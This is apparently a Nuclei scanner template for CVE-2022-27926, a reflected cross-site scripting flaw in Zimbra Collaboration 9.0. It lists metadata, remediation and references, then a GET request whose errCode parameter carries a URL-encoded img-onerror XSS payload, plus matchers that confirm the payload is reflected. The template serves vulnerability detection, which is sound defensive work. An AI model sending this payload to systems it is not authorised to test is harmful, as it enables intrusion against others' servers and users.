nuclei-templates/http/cves/2022/CVE-2022-27926.yaml

52 lines
1.7 KiB
YAML

id: CVE-2022-27926
info:
name: Zimbra Collaboration (ZCS) - Cross Site Scripting
author: rootxharsh,iamnoooob,pdresearch
severity: medium
description: |
A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.
remediation: |
Apply the latest security patches or updates provided by Zimbra to fix the XSS vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-27926
- https://wiki.zimbra.com/wiki/Security_Center
- https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-27926
cwe-id: CWE-79
epss-score: 0.91614
epss-percentile: 0.9863
cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: zimbra
product: collaboration
tags: cve,cve2022,zimbra,xss,kev
http:
- method: GET
path:
- "{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain)>Title???'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a0048304602210087c48cb0c4da6d6aef5b1191453449638e9908f068ace53f80f68fed8325b662022100d4ec4680691b872d328e5a5e1e7303180f2f06af7c67d009f923bdba313bde8f:922c64590222798bb761d5b6d8e72950